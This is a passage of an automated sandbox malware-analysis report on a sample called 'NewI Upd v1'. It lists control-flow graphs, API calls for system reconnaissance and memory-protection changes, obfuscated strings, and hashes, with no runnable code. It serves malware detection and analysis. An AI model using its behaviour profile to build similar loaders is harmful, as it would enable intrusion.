381->390 381->391 381->392 382->378 383->366 383->367 383->368 383->369 383->370 383->372 383->373 383->374 383->375 383->376 383->377 383->378 383->379 383->380 383->382 383->384 383->385 384->375 386->386 396 423687-42368f 386->396 388->390 394 423a56 389->394 395 423a4f-423a54 389->395 398 423aa0 390->398 400 423ac1 391->400 401 423aba-423abf 391->401 392->388 404 423a59-423a77 call 408040 394->404 395->404 396->368 405 423695-4236a4 396->405 406 423ac8-423aff call 408040 400->406 401->406 404->388 404->390 404->391 404->392 421 423ba0-423bb3 404->421 422 423d40-423d46 call 408050 404->422 423 423e44-423e5f 404->423 424 423d55-423dff 404->424 425 423bba-423bc3 404->425 426 423d3a 404->426 427 423d28-423d32 404->427 409 4236b0-4236b7 405->409 417 423b00-423b28 406->417 412 4236b9-4236c6 409->412 413 4236cd-4236d3 409->413 412->409 415 4236c8 412->415 413->368 416 4236d9-42370d call 43d440 413->416 415->368 416->366 416->367 416->368 416->369 416->370 416->371 416->372 416->373 416->374 416->375 416->376 416->377 416->378 416->379 416->380 416->381 416->382 416->383 416->384 416->385 416->387 416->388 416->389 416->390 416->391 416->392 417->417 420 423b2a-423b32 417->420 429 423b51-423b5d 420->429 430 423b34-423b39 420->430 421->387 421->388 421->390 421->398 421->422 421->423 421->424 421->425 421->426 421->427 439 423f83 421->439 440 423f89-423f8f call 408050 421->440 441 423d4f 421->441 422->441 438 423e60-423e9a 423->438 434 423e00-423e22 424->434 431 423bc5-423bca 425->431 432 423bcc 425->432 427->426 436 423b81-423b8c call 4403a0 429->436 437 423b5f-423b63 429->437 435 423b40-423b4f 430->435 442 423bd3-423c79 call 408040 431->442 432->442 434->434 445 423e24-423e34 call 421b00 434->445 435->429 435->435 452 423b91-423b99 436->452 446 423b70-423b7f 437->446 438->438 448 423e9c-423f1f 438->448 459 423f92 440->459 458 423c80-423ca4 442->458 456 423e39-423e3c 445->456 446->436 446->446 453 423f20-423f56 448->453 452->421 452->422 452->423 452->424 452->425 452->426 452->427 453->453 454 423f58-423f7b call 421670 453->454 454->439 456->423 458->458 461 423ca6-423cae 458->461 459->459 462 423cb0-423cb7 461->462 463 423cd1-423cdd 461->463 464 423cc0-423ccf 462->464 465 423d01-423d21 GetLogicalDrives call 4403a0 463->465 466 423cdf-423ce3 463->466 464->463 464->464 465->387 465->388 465->390 465->398 465->422 465->423 465->426 465->427 465->439 465->440 465->441 467 423cf0-423cff 466->467 467->465 467->467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: )&$3['E$hi$wvut$5B
                                                                                  • API String ID: 0-2757989969
                                                                                  • Opcode ID: b61a9a04138006db8f7818c13fb7202b9226f6ce124d2ed4416ffb72b38f2d1b
                                                                                  • Instruction ID: 87ab717e552cfa7345cae70ed095f7effe2035c3a8ecb19a8652f0f8d304fe99
                                                                                  • Opcode Fuzzy Hash: b61a9a04138006db8f7818c13fb7202b9226f6ce124d2ed4416ffb72b38f2d1b
                                                                                  • Instruction Fuzzy Hash: 5012DBB5608301CFD704CF29E89166BB7E1FF86314F48893DE5868B362E7389905CB4A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 519 423960-4239af 520 4239b0-4239c2 519->520 520->520 521 4239c4-423a0f 520->521 523 423a10-423a34 521->523 523->523 524 423a36-423a40 523->524 525 423aa2-423aae 524->525 526 423ba0-423bb3 524->526 527 423a86-423a8c call 408050 524->527 528 423a47-423a4d 524->528 529 423d55-423dff 524->529 530 423bba-423bc3 524->530 531 423d3a 524->531 532 423d28-423d32 524->532 533 423a7e 524->533 534 423aaf-423ab8 524->534 535 423a8f-423a94 524->535 526->525 526->527 526->529 526->530 526->531 526->532 526->535 544 423aa0 526->544 545 423f83 526->545 546 423d40-423d46 call 408050 526->546 547 423e44-423e5f 526->547 548 423f89-423f8f call 408050 526->548 549 423d4f 526->549 527->535 540 423a56 528->540 541 423a4f-423a54 528->541 542 423e00-423e22 529->542 536 423bc5-423bca 530->536 537 423bcc 530->537 532->531 533->527 538 423ac1 534->538 539 423aba-423abf 534->539 535->544 550 423bd3-423c79 call 408040 536->550 537->550 552 423ac8-423aff call 408040 538->552 539->552 551 423a59-423a77 call 408040 540->551 541->551 542->542 556 423e24-423e34 call 421b00 542->556 546->549 557 423e60-423e9a 547->557 573 423f92 548->573 571 423c80-423ca4 550->571 551->526 551->527 551->529 551->530 551->531 551->532 551->533 551->534 551->535 551->546 551->547 572 423b00-423b28 552->572 568 423e39-423e3c 556->568 557->557 564 423e9c-423f1f 557->564 569 423f20-423f56 564->569 568->547 569->569 570 423f58-423f7b call 421670 569->570 570->545 571->571 575 423ca6-423cae 571->575 572->572 577 423b2a-423b32 572->577 573->573 579 423cb0-423cb7 575->579 580 423cd1-423cdd 575->580 581 423b51-423b5d 577->581 582 423b34-423b39 577->582 583 423cc0-423ccf 579->583 584 423d01-423d21 GetLogicalDrives call 4403a0 580->584 585 423cdf-423ce3 580->585 587 423b81-423b8c call 4403a0 581->587 588 423b5f-423b63 581->588 586 423b40-423b4f 582->586 583->580 583->583 584->525 584->527 584->531 584->532 584->535 584->544 584->545 584->546 584->547 584->548 584->549 589 423cf0-423cff 585->589 586->581 586->586 594 423b91-423b99 587->594 590 423b70-423b7f 588->590 589->584 589->589 590->587 590->590 594->526 594->529 594->530 594->531 594->532 594->546 594->547
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: )&$3['E$WT$hi
                                                                                  • API String ID: 0-2566539442
                                                                                  • Opcode ID: 16a6c30e9ae05e6193dff80909fd3a4d7fcdde9c2c5d5c819ce6ba08a850c8fd
                                                                                  • Instruction ID: 5425cab7791a3f5709cc17f90c9203181da709ac52fb4b0ed4d6cae0f982c5a3
                                                                                  • Opcode Fuzzy Hash: 16a6c30e9ae05e6193dff80909fd3a4d7fcdde9c2c5d5c819ce6ba08a850c8fd
                                                                                  • Instruction Fuzzy Hash: A9F1CAB46083418FD704DF25E89262BBBF1FF86304F44892DE5858B351E7798A09CB5B

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 595 42d199-42d1b5 596 42d1c0-42d207 595->596 596->596 597 42d209-42d210 596->597 598 42d552-42d554 597->598 599 42d216-42d21f 597->599 600 42d557-42d573 598->600 601 42d220-42d229 599->601 602 42d580-42d5a6 600->602 601->601 603 42d22b-42d22e 601->603 602->602 604 42d5a8-42d5af 602->604 603->600 605 42d5b1-42d5b5 604->605 606 42d5cb-42d5d7 604->606 607 42d5c0-42d5c9 605->607 608 42d5f1-42d619 call 43ed30 606->608 609 42d5d9-42d5db 606->609 607->606 607->607 613 42d61e-42d65f GetPhysicallyInstalledSystemMemory 608->613 610 42d5e0-42d5ed 609->610 610->610 612 42d5ef 610->612 612->608 614 42d660-42d6a6 613->614 614->614 615 42d6a8-42d6e1 call 41e540 614->615 618 42d6f0-42d720 615->618 618->618 619 42d722-42d729 618->619 620 42d72b-42d733 619->620 621 42d74d 619->621 622 42d740-42d749 620->622 623 42d751-42d759 621->623 622->622 624 42d74b 622->624 625 42d76b-42d778 623->625 626 42d75b-42d75f 623->626 624->623 628 42d77a-42d781 625->628 629 42d79b-42d7f6 625->629 627 42d760-42d769 626->627 627->625 627->627 630 42d790-42d799 628->630 631 42d800-42d82e 629->631 630->629 630->630 631->631 632 42d830-42d837 631->632 633 42d839-42d841 632->633 634 42d85d 632->634 635 42d850-42d859 633->635 636 42d861-42d86e 634->636 635->635 637 42d85b 635->637 638 42d870-42d877 636->638 639 42d88b-42d95d 636->639 637->636 640 42d880-42d889 638->640 640->639 640->640
                                                                                  APIs
                                                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D629
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InstalledMemoryPhysicallySystem
                                                                                  • String ID: #<2$8$:8_S$:8_S
                                                                                  • API String ID: 3960555810-1711014019
                                                                                  • Opcode ID: ce2c4453b8566232e41b7078700ddb26d60c84cd3a82fbc57576ec9656e9b6f8
                                                                                  • Instruction ID: b41c2b6f15fe5ca7851117f4412b1f0257a9303f594137032b6cfe41782a746b
                                                                                  • Opcode Fuzzy Hash: ce2c4453b8566232e41b7078700ddb26d60c84cd3a82fbc57576ec9656e9b6f8
                                                                                  • Instruction Fuzzy Hash: 8CC10671A0C3918FC329CF2994503ABFFE1AFD6304F1889AED0D997352D6788906CB56

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 641 408780-408791 call 43ce80 644 408797-40879e call 435940 641->644 645 408b4d-408b4f ExitProcess 641->645 648 4087a4-4087ca GetCurrentProcessId GetCurrentThreadId 644->648 649 408b36-408b3d 644->649 650 4087d0-40899f SHGetSpecialFolderPathW 648->650 651 4087cc-4087ce 648->651 652 408b48 call 43d3a0 649->652 653 408b3f-408b45 call 408050 649->653 654 4089a0-408a30 650->654 651->650 652->645 653->652 654->654 657 408a36-408a76 call 43bae0 654->657 661 408a80-408a9c 657->661 662 408ab6-408ace GetForegroundWindow 661->662 663 408a9e-408ab4 661->663 664 408ad0-408afd 662->664 665 408aff-408b2a call 409e90 662->665 663->661 664->665 665->649 668 408b2c call 40ca00 665->668 670 408b31 call 40b8b0 668->670 670->649
                                                                                  APIs
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004087A4
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004087AE
                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040891E
                                                                                  • GetForegroundWindow.USER32 ref: 00408AC6
                                                                                  • ExitProcess.KERNEL32 ref: 00408B4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4063528623-0
                                                                                  • Opcode ID: d37a260a9ecd85fabef59688b82412c86662cb0cce4fca0a3288464d8c81903f
                                                                                  • Instruction ID: 8fc3ef7360a1bfd126cce8819e7641f9da8bcd8e83b5a1da64e32e5f433aa2eb
                                                                                  • Opcode Fuzzy Hash: d37a260a9ecd85fabef59688b82412c86662cb0cce4fca0a3288464d8c81903f
                                                                                  • Instruction Fuzzy Hash: B0A1E4B7F547104FD308DF69CD9236AB6D2ABC8310F0E853EA889E7395DA789C058785

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 681 42d53a-42d573 call 432e00 call 408050 687 42d580-42d5a6 681->687 687->687 688 42d5a8-42d5af 687->688 689 42d5b1-42d5b5 688->689 690 42d5cb-42d5d7 688->690 691 42d5c0-42d5c9 689->691 692 42d5f1-42d65f call 43ed30 GetPhysicallyInstalledSystemMemory 690->692 693 42d5d9-42d5db 690->693 691->690 691->691 698 42d660-42d6a6 692->698 694 42d5e0-42d5ed 693->694 694->694 696 42d5ef 694->696 696->692 698->698 699 42d6a8-42d6e1 call 41e540 698->699 702 42d6f0-42d720 699->702 702->702 703 42d722-42d729 702->703 704 42d72b-42d733 703->704 705 42d74d 703->705 706 42d740-42d749 704->706 707 42d751-42d759 705->707 706->706 708 42d74b 706->708 709 42d76b-42d778 707->709 710 42d75b-42d75f 707->710 708->707 712 42d77a-42d781 709->712 713 42d79b-42d7f6 709->713 711 42d760-42d769 710->711 711->709 711->711 714 42d790-42d799 712->714 715 42d800-42d82e 713->715 714->713 714->714 715->715 716 42d830-42d837 715->716 717 42d839-42d841 716->717 718 42d85d 716->718 719 42d850-42d859 717->719 720 42d861-42d86e 718->720 719->719 721 42d85b 719->721 722 42d870-42d877 720->722 723 42d88b-42d95d 720->723 721->720 724 42d880-42d889 722->724 724->723 724->724
                                                                                  APIs
                                                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D629
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InstalledMemoryPhysicallySystem
                                                                                  • String ID: #<2$:8_S
                                                                                  • API String ID: 3960555810-1117466531
                                                                                  • Opcode ID: 18458549155da8a567ec91e5470fa12d1f273227727bde17bf7e5053b90eaa5f
                                                                                  • Instruction ID: d59827cbfe0c607f258890ef7f2152e6f978a59b6f25cebf65e1a99b5ddfb7ff
                                                                                  • Opcode Fuzzy Hash: 18458549155da8a567ec91e5470fa12d1f273227727bde17bf7e5053b90eaa5f
                                                                                  • Instruction Fuzzy Hash: CDA1E471A0C3918FC339CF29D4503ABBBE0AF96304F18896ED4D997342E6798505CB9A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 725 8c06e8-8c0743 call 8bfff8 call 8bfd18 NtProtectVirtualMemory 730 8c0751-8c075e 725->730 731 8c0834-8c0837 730->731 732 8c0764-8c07a9 730->732 733 8c07ce-8c07d6 732->733 734 8c07ab-8c07b4 732->734 737 8c07d8-8c07df 733->737 738 8c07e1 733->738 735 8c07bf 734->735 736 8c07b6-8c07bd 734->736 739 8c07c6-8c07cc 735->739 736->739 740 8c07e8-8c07eb 737->740 738->740 741 8c07ee-8c07f7 739->741 740->741 742 8c07f9-8c0801 741->742 743 8c0804-8c082f call 8bfff8 call 8bfd18 NtProtectVirtualMemory 741->743 742->743 748 8c0745-8c074d 743->748 748->730
                                                                                  APIs
                                                                                    • Part of subcall function 008BFFF8: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 008C0193
                                                                                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000002,00000000,00000000,00000000,082962C8,?,?,008BFA09,?,00000000,?), ref: 008C0729
                                                                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,008BFA09,00000000,00000000,00000000,00000000,082962C8,?,?,008BFA09,?,00000000,?), ref: 008C082B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual$LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 4159661263-3916222277
                                                                                  • Opcode ID: 29f9e2d3866784fb39e4acce5980945244bac95dda44c2316337fe1a20b9e87d
                                                                                  • Instruction ID: 053fcbc375c0a9faee139e168ca7d2f7754957778a4c1512f0c3757e9e5a7f18
                                                                                  • Opcode Fuzzy Hash: 29f9e2d3866784fb39e4acce5980945244bac95dda44c2316337fe1a20b9e87d
                                                                                  • Instruction Fuzzy Hash: 974109B5D01209EBDB08CF94C985BFEBBB5FF58315F208159E815AB281D735AA41CFA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 784 427220-42723b 785 427240-427271 784->785 785->785 786 427273-42727f 785->786 787 427281-427289 786->787 788 4272c4-4272cf 786->788 790 427290-427297 787->790 789 4272d0-4272ea 788->789 789->789 791 4272ec-4272f0 789->791 792 4272a0-4272a6 790->792 793 427299-42729c 790->793 794 427380-427382 791->794 795 4272f6-42731a call 43bae0 791->795 792->788 797 4272a8-4272bc call 43d440 792->797 793->790 796 42729e 793->796 799 427515-42751e 794->799 803 427320-427351 795->803 796->788 802 4272c1 797->802 802->788 803->803 804 427353-42735f 803->804 805 427361-427369 804->805 806 4273a9-4273ad 804->806 809 427370-427377 805->809 807 4273b3-4273bf 806->807 808 42750a-427512 call 43bb00 806->808 810 4273c0-4273d5 807->810 808->799 812 427387-42738d 809->812 813 427379-42737c 809->813 810->810 814 4273d7-4273d9 810->814 812->806 817 42738f-4273a1 call 43d440 812->817 813->809 816 42737e 813->816 818 4273e0-4273ee call 408040 814->818 819 4273db 814->819 816->806 822 4273a6 817->822 824 427400-42740a 818->824 819->818 822->806 825 4273f0-4273fe 824->825 826 42740c-42740f 824->826 825->824 827 427423-427427 825->827 828 427410-42741f 826->828 830 427501-427507 call 408050 827->830 831 42742d-427439 827->831 828->828 829 427421 828->829 829->825 830->808 833 427493-4274cf call 408040 call 408fe0 831->833 834 42743b-427442 831->834 847 4274d0-4274e4 833->847 835 42745c-427460 834->835 838 427462-42746b 835->838 839 427450 835->839 842 427480-427484 838->842 843 42746d-427470 838->843 841 427451-42745a 839->841 841->833 841->835 842->841 845 427486-427491 842->845 843->841 845->841 847->847 848 4274e6-4274fe call 409170 call 408050 847->848 848->830
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: +w.#$1&%2$wvut
                                                                                  • API String ID: 2994545307-2033791228
                                                                                  • Opcode ID: a81c3d9d3362e740736c9379727fe0c72f1735c62d437240dcffbe6a543083bf
                                                                                  • Instruction ID: 79391495058984a366d31e55b643372171f59db6c11c3e1bcefa991314b8ce07
                                                                                  • Opcode Fuzzy Hash: a81c3d9d3362e740736c9379727fe0c72f1735c62d437240dcffbe6a543083bf
                                                                                  • Instruction Fuzzy Hash: 03816A7570C3209FD724EB64EC8273BB792DF91318F58457EE9854B392E6389C01C65A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: wvut$wvutwvut
                                                                                  • API String ID: 2994545307-1902772994
                                                                                  • Opcode ID: cd88c52e2f92706f191ccb82bd1ab95091bdf9e14370203a9c7a89427c9ada3e
                                                                                  • Instruction ID: a757432227b8544b7c7b51f4f27899476d9a1d72537a7805d9706169356b55d1
                                                                                  • Opcode Fuzzy Hash: cd88c52e2f92706f191ccb82bd1ab95091bdf9e14370203a9c7a89427c9ada3e
                                                                                  • Instruction Fuzzy Hash: A1C12936E087548FDB18CB6CC8413AEFBF2AB89314F19456EE496A7382C67D5D01C786
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: >C]z$a
                                                                                  • API String ID: 0-1611460902
                                                                                  • Opcode ID: d77332064ced0ce4feeb818d2309e1dc824399832648fbbdcbc3f9bd78f61149
                                                                                  • Instruction ID: cb682c68824ab18062fd9851a7afa3643033b71ba37c2b0966e6bd7b5f111f66
                                                                                  • Opcode Fuzzy Hash: d77332064ced0ce4feeb818d2309e1dc824399832648fbbdcbc3f9bd78f61149
                                                                                  • Instruction Fuzzy Hash: DE21DE7675C3059FC3188F68CCC176ABBE2FB86304F14983DE195C7280EAB9D5088B0A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7b62d32a76ff7fdafa6cb0beae6803d9548eff8e18d89a198335ccd2f2ce4e8d
                                                                                  • Instruction ID: b2cfd16e2bc963dec3ec478c6f46fbfd8861683387b57bf4ab09c8eb560d1c97
                                                                                  • Opcode Fuzzy Hash: 7b62d32a76ff7fdafa6cb0beae6803d9548eff8e18d89a198335ccd2f2ce4e8d
                                                                                  • Instruction Fuzzy Hash: 3E51DBB2A086419FD718CF29C8527ABB7D2ABD5304F14892EE4E9C7381D738DC45CB96
                                                                                  APIs
                                                                                    • Part of subcall function 008BFFF8: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 008C0193
                                                                                  • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000004,00000000,00000000,6793C34C), ref: 008C022A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2616484454-0
                                                                                  • Opcode ID: c329ee17c0eff391a5dc2086750547225e65861cfc00dc49fadffb7d0c864216
                                                                                  • Instruction ID: 6ec1620fbfa848261225506a6a265236f26406b1774f717f8ab4b345fa9489ec
                                                                                  • Opcode Fuzzy Hash: c329ee17c0eff391a5dc2086750547225e65861cfc00dc49fadffb7d0c864216
                                                                                  • Instruction Fuzzy Hash: 9F61E774A00119EBDB04DFA8C885FBEB7B5FF48315F208259E921EB391DA749A41CB61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: x{tu
                                                                                  • API String ID: 2994545307-3159878047
                                                                                  • Opcode ID: 208624ec6d962c9f99d26acb9f85fdec06fdeb2c03f65521581cb493ee30d8f2
                                                                                  • Instruction ID: dc4cf60dfb3d4a68555e46df7d5ca5704b16df7d2b2bd881c53c0db1d4874407
                                                                                  • Opcode Fuzzy Hash: 208624ec6d962c9f99d26acb9f85fdec06fdeb2c03f65521581cb493ee30d8f2
                                                                                  • Instruction Fuzzy Hash: 26A1AA32B083118FD328CF28D8C166BB7A2EBD9314F19D53ED9854B352DA759C0AC785
                                                                                  APIs
                                                                                  • LdrInitializeThunk.NTDLL(0044037D,005C003F,00000018,?,?,00000018,?,?,?), ref: 0043D46E
                                                                                  Memory Dump Source
